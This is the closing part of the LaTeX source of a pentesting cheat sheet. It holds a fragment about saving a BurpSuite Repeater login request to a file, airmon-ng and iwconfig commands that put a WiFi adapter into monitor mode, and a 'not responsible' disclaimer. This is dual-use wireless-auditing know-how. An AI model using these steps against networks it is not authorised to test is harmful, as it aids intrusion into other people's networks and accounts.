2) -'login.req = info from login screen using results from BurpSuite Repeater using 'Copy to File' \newline % Row Count 28 (+ 2) \seqsplit{=========================================================================================================================== } \newline % Row Count 31 (+ 3) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{How to set a WiFi adapter in Monitor Mode: \newline % Row Count 1 (+ 1) ifconfig wlan0 down \newline % Row Count 2 (+ 1) iwconfig wlan0 mode monitor \newline % Row Count 3 (+ 1) ifconfig wlan0 up \newline % Row Count 4 (+ 1) or \newline % Row Count 5 (+ 1) airmon-ng check kill \newline % Row Count 6 (+ 1) airmon-ng start wlan0 \newline % Row Count 7 (+ 1) \seqsplit{===========================================================================================================================}% Row Count 10 (+ 3) } \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{17.67cm}}{I'm not responsible for anything you do} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \end{document}